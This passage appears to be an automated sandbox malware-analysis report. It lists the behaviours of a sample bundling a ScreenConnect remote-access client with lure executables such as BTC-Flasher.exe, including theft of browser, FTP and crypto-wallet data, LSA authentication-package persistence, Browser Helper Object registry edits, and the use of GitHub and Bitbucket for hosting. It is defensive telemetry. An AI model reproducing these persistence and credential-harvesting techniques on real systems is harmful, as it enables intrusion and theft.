ird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FREE_VPN\"" | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800650039003700330036006400380031006500330038003900360035006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f00300000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f00300000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800650039003700330036006400380031006500330038003900360035006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\{9F774076-6CD0-06AE-2BE4-56DE2B8EA3E5}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID224.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\metadata | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\metadata | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFE0DDF9922708718E.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2691.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{736FB660-E369-072A-7D4C-F7BA8D69BA4E}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI23D5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI27EA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\msedge_installer.log | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFCB1054E542D96845.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFDEC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{DE4078A1-CD72-8FC1-015A-9B8CF3511949}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF22C8E053AF4135F0.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA29D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e61bc20.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF0414A284F7937E3B.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF3BF21D66278E3BA0.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e71f629.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\e61bbf0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{DE4078A1-CD72-8FC1-015A-9B8CF3511949} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA164.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e61bbed.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2473.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI26EF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF797DDB221BAFFD7F.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e61bc08.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB42A18F8576A21E5.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{DE4078A1-CD72-8FC1-015A-9B8CF3511949}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{9F774076-6CD0-06AE-2BE4-56DE2B8EA3E5}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI30EF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e61bc36.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2596.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\wix{3E38E495-441B-B71E-19A8-658C81C8B012}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{736FB660-E369-072A-7D4C-F7BA8D69BA4E} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e61bc06.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e71f629.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{3E38E495-441B-B71E-19A8-658C81C8B012}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF9F8A1B3FE0C07BAA.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF2F2AACC8DE195F8E.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File created | C:\Windows\Installer\{DE4078A1-CD72-8FC1-015A-9B8CF3511949}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI81F2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\b8a32f05-0c52-4dc9-bc31-9e85b7fb9b1e.tmp | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\msedge_installer.log | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIBD74.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
